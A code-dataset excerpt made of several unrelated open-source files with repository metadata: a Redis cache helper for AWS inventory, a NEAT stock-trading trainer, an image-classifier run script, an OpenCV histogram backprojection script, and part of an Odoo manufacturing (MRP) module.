self.ebs_snapshot_hash_prefix = 'aws:ec2:ebs:snap' ## Suffix: region, snapshot id
self.elb_hash_prefix = 'aws:ec2:elb' ## Suffix: region, elb name
self.elastic_ip_hash_prefix = 'aws:ec2:elastic_ip' ## Suffix: ip_address
self.index_prefix = 'aws:index' ## Suffix: index_item
self.all_tags_hash = 'sethji:indexed_tags' ## No Suffix
self.sync_lock_hash = 'sethji:sync_lock' ## No Suffix
self.last_sync_time_hash = 'sethji:last_sync_time' ## No Suffix
self.object_cache_hash = 'sethji:object_cache' ## object path
gevent.spawn_raw(self._close_idle_connections)
def get_cached_object(self, path):
hash_key = "%s:%s" % (self.object_cache_hash, path)
return self.connection.get(hash_key)
def set_object_cache(self, path, content, expire_duration):
hash_key = "%s:%s" % (self.object_cache_hash, path)
self.connection.set(hash_key, content)
if expire_duration:
self.connection.expire(hash_key, expire_duration)
def set_last_sync_time(self):
time_now = int(round(time.time()))
return self.connection.set(self.last_sync_time_hash, time_now)
def get_last_sync_time(self):
return self.connection.get(self.last_sync_time_hash)
def set_sync_lock(self, timeout=None):
if (not timeout) or (timeout <= 0):
return self.connection.delete(self.sync_lock_hash)
time_now = int(round(time.time()))
return self.connection.set(self.sync_lock_hash, time_now, ex=timeout)
def get_sync_lock(self):
return self.connection.get(self.sync_lock_hash)
def save_instance_details(self, item_details):
hash_key = "%s:%s:%s" % (self.instance_hash_prefix,
item_details['region'],
item_details['instance_id'])
status = self.connection.hmset(hash_key, item_details)
return (hash_key, status)
def get_instance_details(self, region, instance_id):
hash_key = "%s:%s:%s" % (self.instance_hash_prefix, region, instance_id)
return self.connection.hgetall(hash_key)
def get_elastic_ip_details(self, elastic_ip):
hash_key = "%s:%s" % (self.elastic_ip_hash_prefix, elastic_ip)
return self.connection.hgetall(hash_key)
def add_instance_detail(self, region, instance_id, key, value):
hash_key = "%s:%s:%s" % (self.instance_hash_prefix, region,
instance_id)
status = self.connection.hset(hash_key, key, value)
return (hash_key, status)
def get_instance_item_value(self, region, instance_id, key):
hash_key = "%s:%s:%s" % (self.instance_hash_prefix, region,
instance_id)
return self.connection.hget(hash_key, key)
def save_elb_details(self, item_details):
hash_key = "%s:%s:%s" % (self.elb_hash_prefix,
item_details['region'],
item_details['elb_name'])
status = self.connection.hmset(hash_key, item_details)
return (hash_key, status)
def get_elb_details(self, region, elb_name):
hash_key = "%s:%s:%s" % (self.elb_hash_prefix, region, elb_name)
return self.connection.hgetall(hash_key)
def save_ebs_vol_details(self, item_details):
hash_key = "%s:%s:%s" % (self.ebs_vol_hash_prefix,
item_details['region'],
item_details['volume_id'])
status = self.connection.hmset(hash_key, item_details)
return (hash_key, status)
def get_ebs_volume_details(self, region, volume_id):
hash_key = "%s:%s:%s" % (self.ebs_vol_hash_prefix, region, volume_id)
return self.connection.hgetall(hash_key)
def save_ebs_snapshot_details(self, item_details):
hash_key = "%s:%s:%s" % (self.ebs_snapshot_hash_prefix,
item_details['region'],
item_details['snapshot_id'])
status = self.connection.hmset(hash_key, item_details)
return (hash_key, status)
def get_ebs_snapshot_details(self, region, snapshot_id):
hash_key = "%s:%s:%s" % (self.ebs_snapshot_hash_prefix, region,
snapshot_id)
return self.connection.hgetall(hash_key)
def save_indexed_tags(self, indexed_tags):
status = self.connection.hmset(self.all_tags_hash, indexed_tags)
return (self.all_tags_hash, status)
def get_indexed_tags(self):
return self.connection.hgetall(self.all_tags_hash)
def save_elastic_ip_details(self, item_details):
hash_key = "%s:%s" % (self.elastic_ip_hash_prefix,
item_details['elastic_ip'])
status = self.connection.hmset(hash_key, item_details)
return (hash_key, status)
def get_details(self, hash_key):
return self.connection.hgetall(hash_key)
def save_index(self, key, value):
hash_key = "%s:%s" % (self.index_prefix, key)
status = self.connection.set(hash_key, value)
return (hash_key, status)
def expire_index(self, key, duration):
hash_key = "%s:%s" % (self.index_prefix, key)
return self.connection.expire(hash_key, duration)
def get_index(self, key):
hash_key = "%s:%s" % (self.index_prefix, key)
return self.connection.get(hash_key)
def exists(self, hash_key):
return self.connection.exists(hash_key)
def expire(self, hash_key, duration):
return self.connection.expire(hash_key, duration)
def cleanup_keys(self, valid_keys):
hash_set = set([])
hash_set.update(self.connection.keys("%s*" % self.instance_hash_prefix) or [])
hash_set.update(self.connection.keys("%s*" % self.ebs_vol_hash_prefix) or [])
hash_set.update(self.connection.keys("%s*" % self.ebs_snapshot_hash_prefix) or [])
hash_set.update(self.connection.keys("%s*" % self.elb_hash_prefix) or [])
hash_set.update(self.connection.keys("%s*" % self.elastic_ip_hash_prefix) or [])
hash_set.update(self.connection.keys("%s*" % self.object_cache_hash) or [])
hash_set.difference_update(set(valid_keys))
if hash_set:
self.connection.delete(*hash_set)
def _close_idle_connections(self):
client_list = self.connection.client_list()
idle_connection_mapping = {}
for client in client_list:
idle_connection_mapping[int(client['idle'])] = client['addr']
idle_time_list = idle_connection_mapping.keys()
idle_time_list.sort(reverse=True)
for idle_time in idle_time_list:
if idle_time < self.idle_timeout:
break
try:
self.connection.client_kill(idle_connection_mapping[idle_time])
except Exception as e:
print "Exception while closing idle redis connection. " \
"Message: %s" % str(e.message)
| 37.446512 | 94 | 0.624146 |
4f43bbc1a9560b8517060d00c3eaa956317262a6 | 2,773 | py | Python | train.py | Reecer9714/NEATStocks | 3bdcaad29149eb14cefc10a8026a0fbf51f630b8 | [
"MIT"
] | null | null | null | train.py | Reecer9714/NEATStocks | 3bdcaad29149eb14cefc10a8026a0fbf51f630b8 | [
"MIT"
] | null | null | null | train.py | Reecer9714/NEATStocks | 3bdcaad29149eb14cefc10a8026a0fbf51f630b8 | [
"MIT"
] | null | null | null | import os
from functools import partial
from random import randint
import neat
import visualize
import multiprocessing
from config import *
from simulator import StockSimulator
from strategy import neat_strategy
simulator = StockSimulator().load_data(stock_ticker)
def calc_fitness(genome, config):
starting_index = len(simulator.stock_data)-num_of_days_to_sim
sim_length = len(simulator.stock_data)-starting_index
# starting_index = randint(num_of_days_to_lookback,len(simulator.stock_data)-num_of_days_to_sim)
simulator.reset_sim()
net = neat.nn.FeedForwardNetwork.create(genome, config)
genome_strategy = partial(neat_strategy, net)
simulator.sim_strategy(genome_strategy, starting_index, sim_length)
fitness, _ = simulator.evaluate()
return fitness
def run(config_file, reporter=neat.StdOutReporter(True)):
# Load configuration.
config = neat.Config(neat.DefaultGenome, neat.DefaultReproduction,
neat.DefaultSpeciesSet, neat.DefaultStagnation,
config_file)
# Create the population, which is the top-level object for a NEAT run.
p = neat.Population(config)
# Add a stdout reporter to show progress in the terminal.
checkpoint_path = os.path.join(os.path.dirname(__file__), 'checkpoints/{}'.format(starting_checkpoint))
if os.path.exists(checkpoint_path):
p = neat.Checkpointer.restore_checkpoint(checkpoint_path)
p.add_reporter(reporter)
stats = neat.StatisticsReporter()
p.add_reporter(stats)
p.add_reporter(neat.Checkpointer(
checkpoint_generations, filename_prefix='checkpoints/{}-checkpoint-'.format(stock_ticker)))
# Run for up to 300 generations.
pe = neat.ParallelEvaluator(multiprocessing.cpu_count(), calc_fitness)
winner = p.run(pe.evaluate, num_of_generations)
net = neat.nn.FeedForwardNetwork.create(winner, config)
genome_strategy = partial(neat_strategy, net)
simulator.sim_strategy(genome_strategy, len(simulator.stock_data)-num_of_days_to_sim, num_of_days_to_sim)
profit, avg_loss = simulator.evaluate()
# Display the winning genome.
print('\nBest genome Profit({}) AvgLoss({}):\n{}'.format(profit-1, avg_loss-1, winner))
visualize.draw_net(config, winner, view=True, node_names=node_names, show_disabled=False)
# stats_fig = visualize.plot_stats(stats, ylog=False, view=True)
# visualize.plot_species(stats, view=False)
if __name__ == '__main__':
# Determine path to configuration file. This path manipulation is
# here so that the script will run successfully regardless of the
# current working directory.
local_dir = os.path.dirname(__file__)
config_path = os.path.join(local_dir, config_file)
run(config_path)
| 40.188406 | 109 | 0.744681 |
d28ca8914568a48d0eb5e60447bd90c6dcbfb22c | 1,084 | py | Python | run_models.py | AineKiraboMbabazi/AIPND_Image_Classifier | 7289adc5f1e811bf09144bd31dbb7c010a27dbc5 | [
"MIT"
] | null | null | null | run_models.py | AineKiraboMbabazi/AIPND_Image_Classifier | 7289adc5f1e811bf09144bd31dbb7c010a27dbc5 | [
"MIT"
] | null | null | null | run_models.py | AineKiraboMbabazi/AIPND_Image_Classifier | 7289adc5f1e811bf09144bd31dbb7c010a27dbc5 | [
"MIT"
] | null | null | null | #!/bin/sh
# */home/workspace/Image classifier/run_models.sh
#
# PROGRAMMER: Ainekirabo Mbabazi
# DATE CREATED: 06/12/2019
# PURPOSE: Runs all three models
#
#
# Usage: sh run_models.sh -- will run program from commandline
#
python train.py flowers --save_dir checkpoint.pth --arch vgg13 --learning_rate 0.001 --hidden_units 1000 --epochs 5 --gpu
python predict.py 'flowers/test/28/image_05230.jpg' checkpoint.pth --top_k 5 --category_names cat_to_name.json --gpu
python train.py flowers --save_dir checkpoint_1.pth --arch 'densenet201' --learning_rate 0.001 --hidden_units 1000 --epochs 5 --gpu
python predict.py 'flowers/test/28/image_05230.jpg' checkpoint_1.pth --top_k 5 --category_names cat_to_name.json --gpu
python train.py flowers --save_dir checkpoint_.pth --arch 'alexnet' --learning_rate 0.001 --hidden_units 1000 --epochs 5 --gpu
python predict.py 'flowers/test/28/image_05230.jpg' checkpoint_.pth --top_k 5 --category_names cat_to_name.json --gpu
| 57.052632 | 133 | 0.678967 |
766d4d8ea03c51ba4a9a0c1f137f2074d1d0c2f5 | 1,058 | py | Python | opencv/misc/slides/hist/backproj/backproj.py | SSG-DRD-IOT/commercial-iot-security-system | 0c3d89b35d0468d4d3cc5ce2653b3f0ac82652a9 | [
"MIT"
] | null | null | null | opencv/misc/slides/hist/backproj/backproj.py | SSG-DRD-IOT/commercial-iot-security-system | 0c3d89b35d0468d4d3cc5ce2653b3f0ac82652a9 | [
"MIT"
] | null | null | null | opencv/misc/slides/hist/backproj/backproj.py | SSG-DRD-IOT/commercial-iot-security-system | 0c3d89b35d0468d4d3cc5ce2653b3f0ac82652a9 | [
"MIT"
] | 3 | 2022-01-22T05:02:41.000Z | 2022-03-31T08:13:06.000Z |
import cv2
import numpy as np
roi = cv2.imread('mtn1.jpg')
hsv = cv2.cvtColor(roi, cv2.COLOR_BGR2HSV)
target = cv2.imread('mtn2_lo.jpg')
hsvt = cv2.cvtColor(target, cv2.COLOR_BGR2HSV)
mask = np.zeros(np.shape(roi), np.uint8)
mask[302:1000, 766:1617] = 255 #766 302, 1617, 1000
# calculating the object histogram
roihist = cv2.calcHist([hsv], [0, 1], None, [180, 256], [0, 180, 0, 256])
# normalize the histogram and apply Backprojection
cv2.normalize(roihist, roihist, 0, 255, cv2.NORM_MINMAX)
# cv2.imshow('roihist' ,roihist)
dst = cv2.calcBackProject([hsvt], [0, 1], roihist, [0, 180, 0, 256], 1)
# # now convolute with circular disk
disk = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (5,5))
cv2.filter2D(dst, -1, disk, dst)
#
# # threshold and binary AND
# ret, thresh = cv2.threshold(dst, 50, 255, 0)
# thresh = cv2.merge((thresh, thresh, thresh))
# res = cv2.bitwise_and(target, thresh)
# cv2.imshow('dist', dst)
cv2.imwrite('dst.jpg', dst)
cv2.imwrite('hist.jpg', roihist)
# res = np.vstack((target, thresh, res))
# cv2.imwrite('res.jpg', res)
| 30.228571 | 73 | 0.695652 |
2a597336a7836b14670691059e68aa614c04ff7b | 68,811 | py | Python | web/addons/mrp/mrp.py | diogocs1/comps | 63df07f6cf21c41e4527c06e2d0499f23f4322e7 | [
"Apache-2.0"
] | null | null | null | web/addons/mrp/mrp.py | diogocs1/comps | 63df07f6cf21c41e4527c06e2d0499f23f4322e7 | [
"Apache-2.0"
] | null | null | null | web/addons/mrp/mrp.py | diogocs1/comps | 63df07f6cf21c41e4527c06e2d0499f23f4322e7 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
import openerp.addons.decimal_precision as dp
from openerp.osv import fields, osv, orm
from openerp.tools import DEFAULT_SERVER_DATETIME_FORMAT
from openerp.tools import float_compare
from openerp.tools.translate import _
from openerp import tools, SUPERUSER_ID
from openerp.addons.product import _common
class mrp_property_group(osv.osv):
"""
Group of mrp properties.
"""
_name = 'mrp.property.group'
_description = 'Property Group'
_columns = {
'name': fields.char('Property Group', required=True),
'description': fields.text('Description'),
}
class mrp_property(osv.osv):
"""
Properties of mrp.
"""
_name = 'mrp.property'
_description = 'Property'
_columns = {
'name': fields.char('Name', required=True),
'composition': fields.selection([('min','min'),('max','max'),('plus','plus')], 'Properties composition', required=True, help="Not used in computations, for information purpose only."),
'group_id': fields.many2one('mrp.property.group', 'Property Group', required=True),
'description': fields.text('Description'),
}
_defaults = {
'composition': lambda *a: 'min',
}
#----------------------------------------------------------
# Work Centers
#----------------------------------------------------------
# capacity_hour : capacity per hour. default: 1.0.
# Eg: If 5 concurrent operations at one time: capacity = 5 (because 5 employees)
# unit_per_cycle : how many units are produced for one cycle
class mrp_workcenter(osv.osv):
_name = 'mrp.workcenter'
_description = 'Work Center'
_inherits = {'resource.resource':"resource_id"}
_columns = {
'note': fields.text('Description', help="Description of the Work Center. Explain here what's a cycle according to this Work Center."),
'capacity_per_cycle': fields.float('Capacity per Cycle', help="Number of operations this Work Center can do in parallel. If this Work Center represents a team of 5 workers, the capacity per cycle is 5."),
'time_cycle': fields.float('Time for 1 cycle (hour)', help="Time in hours for doing one cycle."),
'time_start': fields.float('Time before prod.', help="Time in hours for the setup."),
'time_stop': fields.float('Time after prod.', help="Time in hours for the cleaning."),
'costs_hour': fields.float('Cost per hour', help="Specify Cost of Work Center per hour."),
'costs_hour_account_id': fields.many2one('account.analytic.account', 'Hour Account', domain=[('type','!=','view')],
help="Fill this only if you want automatic analytic accounting entries on production orders."),
'costs_cycle': fields.float('Cost per cycle', help="Specify Cost of Work Center per cycle."),
'costs_cycle_account_id': fields.many2one('account.analytic.account', 'Cycle Account', domain=[('type','!=','view')],
help="Fill this only if you want automatic analytic accounting entries on production orders."),
'costs_journal_id': fields.many2one('account.analytic.journal', 'Analytic Journal'),
'costs_general_account_id': fields.many2one('account.account', 'General Account', domain=[('type','!=','view')]),
'resource_id': fields.many2one('resource.resource','Resource', ondelete='cascade', required=True),
'product_id': fields.many2one('product.product','Work Center Product', help="Fill this product to easily track your production costs in the analytic accounting."),
}
_defaults = {
'capacity_per_cycle': 1.0,
'resource_type': 'material',
}
def on_change_product_cost(self, cr, uid, ids, product_id, context=None):
value = {}
if product_id:
cost = self.pool.get('product.product').browse(cr, uid, product_id, context=context)
value = {'costs_hour': cost.standard_price}
return {'value': value}
class mrp_routing(osv.osv):
"""
For specifying the routings of Work Centers.
"""
_name = 'mrp.routing'
_description = 'Routing'
_columns = {
'name': fields.char('Name', required=True),
'active': fields.boolean('Active', help="If the active field is set to False, it will allow you to hide the routing without removing it."),
'code': fields.char('Code', size=8),
'note': fields.text('Description'),
'workcenter_lines': fields.one2many('mrp.routing.workcenter', 'routing_id', 'Work Centers', copy=True),
'location_id': fields.many2one('stock.location', 'Production Location',
help="Keep empty if you produce at the location where the finished products are needed." \
"Set a location if you produce at a fixed location. This can be a partner location " \
"if you subcontract the manufacturing operations."
),
'company_id': fields.many2one('res.company', 'Company'),
}
_defaults = {
'active': lambda *a: 1,
'company_id': lambda self, cr, uid, context: self.pool.get('res.company')._company_default_get(cr, uid, 'mrp.routing', context=context)
}
class mrp_routing_workcenter(osv.osv):
"""
Defines working cycles and hours of a Work Center using routings.
"""
_name = 'mrp.routing.workcenter'
_description = 'Work Center Usage'
_order = 'sequence'
_columns = {
'workcenter_id': fields.many2one('mrp.workcenter', 'Work Center', required=True),
'name': fields.char('Name', required=True),
'sequence': fields.integer('Sequence', help="Gives the sequence order when displaying a list of routing Work Centers."),
'cycle_nbr': fields.float('Number of Cycles', required=True,
help="Number of iterations this work center has to do in the specified operation of the routing."),
'hour_nbr': fields.float('Number of Hours', required=True, help="Time in hours for this Work Center to achieve the operation of the specified routing."),
'routing_id': fields.many2one('mrp.routing', 'Parent Routing', select=True, ondelete='cascade',
help="Routing indicates all the Work Centers used, for how long and/or cycles." \
"If Routing is indicated then,the third tab of a production order (Work Centers) will be automatically pre-completed."),
'note': fields.text('Description'),
'company_id': fields.related('routing_id', 'company_id', type='many2one', relation='res.company', string='Company', store=True, readonly=True),
}
_defaults = {
'cycle_nbr': lambda *a: 1.0,
'hour_nbr': lambda *a: 0.0,
}
class mrp_bom(osv.osv):
"""
Defines bills of material for a product.
"""
_name = 'mrp.bom'
_description = 'Bill of Material'
_inherit = ['mail.thread']
_columns = {
'name': fields.char('Name'),
'code': fields.char('Reference', size=16),
'active': fields.boolean('Active', help="If the active field is set to False, it will allow you to hide the bills of material without removing it."),
'type': fields.selection([('normal', 'Normal'), ('phantom', 'Set')], 'BoM Type', required=True,
help= "Set: When processing a sales order for this product, the delivery order will contain the raw materials, instead of the finished product."),
'position': fields.char('Internal Reference', help="Reference to a position in an external plan."),
'product_tmpl_id': fields.many2one('product.template', 'Product', domain="[('type', '!=', 'service')]", required=True),
'product_id': fields.many2one('product.product', 'Product Variant',
domain="['&', ('product_tmpl_id','=',product_tmpl_id), ('type','!=', 'service')]",
help="If a product variant is defined the BOM is available only for this product."),
'bom_line_ids': fields.one2many('mrp.bom.line', 'bom_id', 'BoM Lines', copy=True),
'product_qty': fields.float('Product Quantity', required=True, digits_compute=dp.get_precision('Product Unit of Measure')),
'product_uom': fields.many2one('product.uom', 'Product Unit of Measure', required=True, help="Unit of Measure (Unit of Measure) is the unit of measurement for the inventory control"),
'date_start': fields.date('Valid From', help="Validity of this BoM. Keep empty if it's always valid."),
'date_stop': fields.date('Valid Until', help="Validity of this BoM. Keep empty if it's always valid."),
'sequence': fields.integer('Sequence', help="Gives the sequence order when displaying a list of bills of material."),
'routing_id': fields.many2one('mrp.routing', 'Routing', help="The list of operations (list of work centers) to produce the finished product. "\
"The routing is mainly used to compute work center costs during operations and to plan future loads on work centers based on production planning."),
'product_rounding': fields.float('Product Rounding', help="Rounding applied on the product quantity."),
'product_efficiency': fields.float('Manufacturing Efficiency', required=True, help="A factor of 0.9 means a loss of 10% during the production process."),
'property_ids': fields.many2many('mrp.property', string='Properties'),
'company_id': fields.many2one('res.company', 'Company', required=True),
}
def _get_uom_id(self, cr, uid, *args):
return self.pool["product.uom"].search(cr, uid, [], limit=1, order='id')[0]
_defaults = {
'active': lambda *a: 1,
'product_qty': lambda *a: 1.0,
'product_efficiency': lambda *a: 1.0,
'product_rounding': lambda *a: 0.0,
'type': lambda *a: 'normal',
'product_uom': _get_uom_id,
'company_id': lambda self, cr, uid, c: self.pool.get('res.company')._company_default_get(cr, uid, 'mrp.bom', context=c),
}
_order = "sequence"
def _bom_find(self, cr, uid, product_tmpl_id=None, product_id=None, properties=None, context=None):
""" Finds BoM for particular product and product uom.
@param product_tmpl_id: Selected product.
@param product_uom: Unit of measure of a product.
@param properties: List of related properties.
@return: False or BoM id.
"""
if properties is None:
properties = []
if product_id:
if not product_tmpl_id:
product_tmpl_id = self.pool['product.product'].browse(cr, uid, product_id, context=context).product_tmpl_id.id
domain = [
'|',
('product_id', '=', product_id),
'&',
('product_id', '=', False),
('product_tmpl_id', '=', product_tmpl_id)
]
elif product_tmpl_id:
domain = [('product_id', '=', False), ('product_tmpl_id', '=', product_tmpl_id)]
else:
# neither product nor template, makes no sense to search
return False
domain = domain + [ '|', ('date_start', '=', False), ('date_start', '<=', time.strftime(DEFAULT_SERVER_DATETIME_FORMAT)),
'|', ('date_stop', '=', False), ('date_stop', '>=', time.strftime(DEFAULT_SERVER_DATETIME_FORMAT))]
# order to prioritize bom with product_id over the one without
ids = self.search(cr, uid, domain, order='product_id', context=context)
# Search a BoM which has all properties specified, or if you can not find one, you could
# pass a BoM without any properties
bom_empty_prop = False
for bom in self.pool.get('mrp.bom').browse(cr, uid, ids, context=context):
if not set(map(int, bom.property_ids or [])) - set(properties or []):
if properties and not bom.property_ids:
bom_empty_prop = bom.id
else:
return bom.id
return bom_empty_prop
def _bom_explode(self, cr, uid, bom, product, factor, properties=None, level=0, routing_id=False, previous_products=None, master_bom=None, context=None):
""" Finds Products and Work Centers for related BoM for manufacturing order.
@param bom: BoM of particular product template.
@param product: Select a particular variant of the BoM. If False use BoM without variants.
@param factor: Factor represents the quantity, but in UoM of the BoM, taking into account the numbers produced by the BoM
@param properties: A List of properties Ids.
@param level: Depth level to find BoM lines starts from 10.
@param previous_products: List of product previously use by bom explore to avoid recursion
@param master_bom: When recursion, used to display the name of the master bom
@return: result: List of dictionaries containing product details.
result2: List of dictionaries containing Work Center details.
"""
uom_obj = self.pool.get("product.uom")
routing_obj = self.pool.get('mrp.routing')
master_bom = master_bom or bom
def _factor(factor, product_efficiency, product_rounding):
factor = factor / (product_efficiency or 1.0)
factor = _common.ceiling(factor, product_rounding)
if factor < product_rounding:
factor = product_rounding
return factor
factor = _factor(factor, bom.product_efficiency, bom.product_rounding)
result = []
result2 = []
routing = (routing_id and routing_obj.browse(cr, uid, routing_id)) or bom.routing_id or False
if routing:
for wc_use in routing.workcenter_lines:
wc = wc_use.workcenter_id
d, m = divmod(factor, wc_use.workcenter_id.capacity_per_cycle)
mult = (d + (m and 1.0 or 0.0))
cycle = mult * wc_use.cycle_nbr
result2.append({
'name': tools.ustr(wc_use.name) + ' - ' + tools.ustr(bom.product_tmpl_id.name_get()[0][1]),
'workcenter_id': wc.id,
'sequence': level + (wc_use.sequence or 0),
'cycle': cycle,
'hour': float(wc_use.hour_nbr * mult + ((wc.time_start or 0.0) + (wc.time_stop or 0.0) + cycle * (wc.time_cycle or 0.0)) * (wc.time_efficiency or 1.0)),
})
for bom_line_id in bom.bom_line_ids:
if bom_line_id.date_start and bom_line_id.date_start > time.strftime(DEFAULT_SERVER_DATETIME_FORMAT) or \
bom_line_id.date_stop and bom_line_id.date_stop < time.strftime(DEFAULT_SERVER_DATETIME_FORMAT):
continue
# all bom_line_id variant values must be in the product
if bom_line_id.attribute_value_ids:
if not product or (set(map(int,bom_line_id.attribute_value_ids or [])) - set(map(int,product.attribute_value_ids))):
continue
if previous_products and bom_line_id.product_id.product_tmpl_id.id in previous_products:
raise osv.except_osv(_('Invalid Action!'), _('BoM "%s" contains a BoM line with a product recursion: "%s".') % (master_bom.name,bom_line_id.product_id.name_get()[0][1]))
quantity = _factor(bom_line_id.product_qty * factor, bom_line_id.product_efficiency, bom_line_id.product_rounding)
bom_id = self._bom_find(cr, uid, product_id=bom_line_id.product_id.id, properties=properties, context=context)
#If BoM should not behave like PhantoM, just add the product, otherwise explode further
if bom_line_id.type != "phantom" and (not bom_id or self.browse(cr, uid, bom_id, context=context).type != "phantom"):
result.append({
'name': bom_line_id.product_id.name,
'product_id': bom_line_id.product_id.id,
'product_qty': quantity,
'product_uom': bom_line_id.product_uom.id,
'product_uos_qty': bom_line_id.product_uos and _factor(bom_line_id.product_uos_qty * factor, bom_line_id.product_efficiency, bom_line_id.product_rounding) or False,
'product_uos': bom_line_id.product_uos and bom_line_id.product_uos.id or False,
})
elif bom_id:
all_prod = [bom.product_tmpl_id.id] + (previous_products or [])
bom2 = self.browse(cr, uid, bom_id, context=context)
# We need to convert to units/UoM of chosen BoM
factor2 = uom_obj._compute_qty(cr, uid, bom_line_id.product_uom.id, quantity, bom2.product_uom.id)
quantity2 = factor2 / bom2.product_qty
res = self._bom_explode(cr, uid, bom2, bom_line_id.product_id, quantity2,
properties=properties, level=level + 10, previous_products=all_prod, master_bom=master_bom, context=context)
result = result + res[0]
result2 = result2 + res[1]
else:
raise osv.except_osv(_('Invalid Action!'), _('BoM "%s" contains a phantom BoM line but the product "%s" does not have any BoM defined.') % (master_bom.name,bom_line_id.product_id.name_get()[0][1]))
return result, result2
def copy_data(self, cr, uid, id, default=None, context=None):
if default is None:
default = {}
bom_data = self.read(cr, uid, id, [], context=context)
default.update(name=_("%s (copy)") % (bom_data['name']))
return super(mrp_bom, self).copy_data(cr, uid, id, default, context=context)
def onchange_uom(self, cr, uid, ids, product_tmpl_id, product_uom, context=None):
res = {'value': {}}
if not product_uom or not product_tmpl_id:
return res
product = self.pool.get('product.template').browse(cr, uid, product_tmpl_id, context=context)
uom = self.pool.get('product.uom').browse(cr, uid, product_uom, context=context)
if uom.category_id.id != product.uom_id.category_id.id:
res['warning'] = {'title': _('Warning'), 'message': _('The Product Unit of Measure you chose has a different category than in the product form.')}
res['value'].update({'product_uom': product.uom_id.id})
return res
def onchange_product_tmpl_id(self, cr, uid, ids, product_tmpl_id, product_qty=0, context=None):
""" Changes UoM and name if product_id changes.
@param product_id: Changed product_id
@return: Dictionary of changed values
"""
res = {}
if product_tmpl_id:
prod = self.pool.get('product.template').browse(cr, uid, product_tmpl_id, context=context)
res['value'] = {
'name': prod.name,
'product_uom': prod.uom_id.id,
}
return res
class mrp_bom_line(osv.osv):
_name = 'mrp.bom.line'
_order = "sequence"
def _get_child_bom_lines(self, cr, uid, ids, field_name, arg, context=None):
"""If the BOM line refers to a BOM, return the ids of the child BOM lines"""
bom_obj = self.pool['mrp.bom']
res = {}
for bom_line in self.browse(cr, uid, ids, context=context):
bom_id = bom_obj._bom_find(cr, uid,
product_tmpl_id=bom_line.product_id.product_tmpl_id.id,
product_id=bom_line.product_id.id, context=context)
if bom_id:
child_bom = bom_obj.browse(cr, uid, bom_id, context=context)
res[bom_line.id] = [x.id for x in child_bom.bom_line_ids]
else:
res[bom_line.id] = False
return res
_columns = {
'type': fields.selection([('normal', 'Normal'), ('phantom', 'Phantom')], 'BoM Line Type', required=True,
help="Phantom: this product line will not appear in the raw materials of manufacturing orders,"
"it will be directly replaced by the raw materials of its own BoM, without triggering"
"an extra manufacturing order."),
'product_id': fields.many2one('product.product', 'Product', required=True),
'product_uos_qty': fields.float('Product UOS Qty'),
'product_uos': fields.many2one('product.uom', 'Product UOS', help="Product UOS (Unit of Sale) is the unit of measurement for the invoicing and promotion of stock."),
'product_qty': fields.float('Product Quantity', required=True, digits_compute=dp.get_precision('Product Unit of Measure')),
'product_uom': fields.many2one('product.uom', 'Product Unit of Measure', required=True,
help="Unit of Measure (Unit of Measure) is the unit of measurement for the inventory control"),
'date_start': fields.date('Valid From', help="Validity of component. Keep empty if it's always valid."),
'date_stop': fields.date('Valid Until', help="Validity of component. Keep empty if it's always valid."),
'sequence': fields.integer('Sequence', help="Gives the sequence order when displaying."),
'routing_id': fields.many2one('mrp.routing', 'Routing', help="The list of operations (list of work centers) to produce the finished product. The routing is mainly used to compute work center costs during operations and to plan future loads on work centers based on production planning."),
'product_rounding': fields.float('Product Rounding', help="Rounding applied on the product quantity."),
'product_efficiency': fields.float('Manufacturing Efficiency', required=True, help="A factor of 0.9 means a loss of 10% within the production process."),
'property_ids': fields.many2many('mrp.property', string='Properties'), #Not used
'bom_id': fields.many2one('mrp.bom', 'Parent BoM', ondelete='cascade', select=True, required=True),
'attribute_value_ids': fields.many2many('product.attribute.value', string='Variants', help="BOM Product Variants needed form apply this line."),
'child_line_ids': fields.function(_get_child_bom_lines, relation="mrp.bom.line", string="BOM lines of the referred bom", type="one2many")
}
def _get_uom_id(self, cr, uid, *args):
return self.pool["product.uom"].search(cr, uid, [], limit=1, order='id')[0]
_defaults = {
'product_qty': lambda *a: 1.0,
'product_efficiency': lambda *a: 1.0,
'product_rounding': lambda *a: 0.0,
'type': lambda *a: 'normal',
'product_uom': _get_uom_id,
}
_sql_constraints = [
('bom_qty_zero', 'CHECK (product_qty>0)', 'All product quantities must be greater than 0.\n' \
'You should install the mrp_byproduct module if you want to manage extra products on BoMs !'),
]
def onchange_uom(self, cr, uid, ids, product_id, product_uom, context=None):
res = {'value': {}}
if not product_uom or not product_id:
return res
product = self.pool.get('product.product').browse(cr, uid, product_id, context=context)
uom = self.pool.get('product.uom').browse(cr, uid, product_uom, context=context)
if uom.category_id.id != product.uom_id.category_id.id:
res['warning'] = {'title': _('Warning'), 'message': _('The Product Unit of Measure you chose has a different category than in the product form.')}
res['value'].update({'product_uom': product.uom_id.id})
return res
def onchange_product_id(self, cr, uid, ids, product_id, product_qty=0, context=None):
""" Changes UoM if product_id changes.
@param product_id: Changed product_id
@return: Dictionary of changed values
"""
res = {}
if product_id:
prod = self.pool.get('product.product').browse(cr, uid, product_id, context=context)
res['value'] = {
'product_uom': prod.uom_id.id,
'product_uos_qty': 0,
'product_uos': False
}
if prod.uos_id.id:
res['value']['product_uos_qty'] = product_qty * prod.uos_coeff
res['value']['product_uos'] = prod.uos_id.id
return res
class mrp_production(osv.osv):
"""
Production Orders / Manufacturing Orders
"""
_name = 'mrp.production'
_description = 'Manufacturing Order'
_date_name = 'date_planned'
_inherit = ['mail.thread', 'ir.needaction_mixin']
def _production_calc(self, cr, uid, ids, prop, unknow_none, context=None):
""" Calculates total hours and total no. of cycles for a production order.
@param prop: Name of field.
@param unknow_none:
@return: Dictionary of values.
"""
result = {}
for prod in self.browse(cr, uid, ids, context=context):
result[prod.id] = {
'hour_total': 0.0,
'cycle_total': 0.0,
}
for wc in prod.workcenter_lines:
result[prod.id]['hour_total'] += wc.hour
result[prod.id]['cycle_total'] += wc.cycle
return result
